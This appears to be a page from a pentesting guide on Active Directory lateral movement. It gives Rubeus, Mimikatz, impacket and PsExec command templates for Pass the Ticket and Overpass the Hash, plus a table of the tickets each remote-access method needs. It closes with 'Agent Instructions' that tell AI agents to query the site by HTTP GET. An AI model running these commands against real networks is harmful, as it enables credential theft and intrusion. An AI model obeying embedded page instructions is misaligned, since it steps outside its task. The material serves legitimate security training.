# Lateral Movement ## Introduction In this section, you will find some techniques in order to perform lateral movements on **Active Directory** infrastructuree. ## Pass The Ticket (PTT) In the Pass the Ticket technique, an attacker obtains a valid Kerberos ticket-granting ticket (TGT) by stealing it from a user or extracting it from a computer's memory. The attacker can then use this TGT to request additional service tickets without the need for any further authentication. You can perform this technique with **Rubeus**. ```bash .\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain: /username: /password:FakePass123 /ticket: ``` Depending on the obtained TGS you, will only be able to perform specific tasks. ### Tickets - Techniques | Service Type | Required Tickets | | ------------------------------------------ | --------------------------------------------------------- | | Windows File Share (PsExec) | CIFS | | LDAP Operations (DSync) | LDAP | | WinRM |

HOST
HTTP
WINRM

| | WMI |

HOST
RPCSS

| | Powershell Remoting |

HOST
HTTP
Depending on OS:
WSMAN
RPCSS

| | Schedule Taks | Host | | Windows Remote Server Administration Tools |

RPCSS
LDAP
CIFS

| | Golden Tickets | krbtgt | ## Overpass The Hash (OTH) This technique allows a user to request a Kerberos TGT using its NTLM or AES/RC4 hash. * **Alternative 1 - Without HIGH privileges** 
# Alternative 1
.\Rubeus.exe asktgt /nowrap /user:<USER> [/dc:<DC_IP>] [/ntlm:<HASH_NTLM>|/aes256:<AES256_KEY>|/rc4:<RC4_KEY>] [/opsec|/force] /ptt 
# Alternative 2
impacket-getTGT <DOMAIN>/<USERSNAME>[:password] -dc-ip <DC_IP> -hashes LMHASH:NTHASH
* Alterntative 2 - Requires HIGH privileges ```bash [.\Mimikatz.exe | .\SafetyKatz.exe ] "sekurlsa::pth /user: /domain: [/ntlm:|/aes256:|/rc4:] /run:[cmd.exe | powershell.exe]" "exit" ``` Then, you can use PsExec to access the machine, if the user has administrator privileges. > :information\_source:The `-s` argument is to upgrade to "nt authority\system", but it will only work if you are going to connect as a highly privileged user. ```bash # Alternative 1 .\PsExec.exe /accepteula [-s] \\ # Alternative 2 export KRB5CCNAME= impacket-psexec -k -no-pass [[domain/]username@] -dc-ip [-c ] ``` ## S4U2Self Abuse (Constrained Delegation) The exploitation is seen on the [Kerberos exploitation phase](/active-directory/kerberos.md#s4u2self-abuse). ## Alternate Service Name (Constrained Delegation) The exploitation is seen on the [Kerberos exploitation phase](/active-directory/kerberos.md#alternate-service-name). ## References * [Attacking Kerberos: Constrained Delegation](https://www.notsoshant.io/blog/attacking-kerberos-constrained-delegation/) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://the-pentesting-guide.marmeus.com/lateral-movement.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.